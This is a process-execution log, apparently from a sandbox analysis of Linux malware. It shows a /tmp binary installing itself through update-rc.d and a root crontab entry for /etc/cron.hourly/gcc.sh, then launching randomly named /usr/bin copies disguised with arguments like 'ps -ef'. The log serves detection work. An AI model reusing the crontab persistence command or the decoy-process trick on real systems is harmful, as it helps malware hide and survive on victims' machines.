                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/sbin/update-rc.d
                                                                  Arguments:update-rc.d HaJTqGiPpD defaults
                                                                  File size:3478464 bytes
                                                                  MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                  Start time (UTC):13:33:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/sbin/update-rc.d
                                                                  Arguments:-
                                                                  File size:3478464 bytes
                                                                  MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                  Start time (UTC):13:33:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/bin/systemctl
                                                                  Arguments:systemctl daemon-reload
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/bin/sed
                                                                  Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                                  File size:121288 bytes
                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:/usr/bin/kigdktzeum who 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:/usr/bin/kigdktzeum sh 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:/usr/bin/kigdktzeum "ls -la" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:/usr/bin/kigdktzeum uptime 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:/usr/bin/kigdktzeum id 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:17
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kigdktzeum
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:487aaa06ee19b8dfaa6a6b2eef2535e4

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:/usr/bin/mizdkrdyqj "ps -ef" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:/usr/bin/mizdkrdyqj "ls -la" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:/usr/bin/mizdkrdyqj "grep \"A\"" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:/usr/bin/mizdkrdyqj sh 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:/usr/bin/mizdkrdyqj "sleep 1" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:23
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/mizdkrdyqj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:e0198a1a12f1f0963ee32aeae9384d8b

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:/usr/bin/becqudbgme su 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:/usr/bin/becqudbgme ls 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:/usr/bin/becqudbgme su 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:/usr/bin/becqudbgme bash 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:/usr/bin/becqudbgme sh 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:29
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/becqudbgme
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cb780d7ae3ef97f4221a67b15940a84d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:/usr/bin/sxruomujjd "ps -ef" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:/usr/bin/sxruomujjd "netstat -antop" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:/usr/bin/sxruomujjd top 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:35
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:34
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:/usr/bin/sxruomujjd "ps -ef" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:35
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:35
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:35
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:35
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:/usr/bin/sxruomujjd "cat resolv.conf" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:35
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sxruomujjd
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:cba8307e43bff3556880dcd526a511a5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:/usr/bin/qrabekbstr bash 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:/usr/bin/qrabekbstr sh 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:/usr/bin/qrabekbstr pwd 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:/usr/bin/qrabekbstr top 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:/usr/bin/qrabekbstr "netstat -antop" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:40
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/qrabekbstr
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:1975c0ca7e1b7192bccb225af16f47b5

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sotpizdssr
                                                                  Arguments:/usr/bin/sotpizdssr top 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:60d7d2347ab3a1dd326249ca54ebfd91

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sotpizdssr
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:60d7d2347ab3a1dd326249ca54ebfd91

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sotpizdssr
                                                                  Arguments:/usr/bin/sotpizdssr "route -n" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:60d7d2347ab3a1dd326249ca54ebfd91

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/sotpizdssr
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:60d7d2347ab3a1dd326249ca54ebfd91

                                                                  Start time (UTC):13:33:46
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
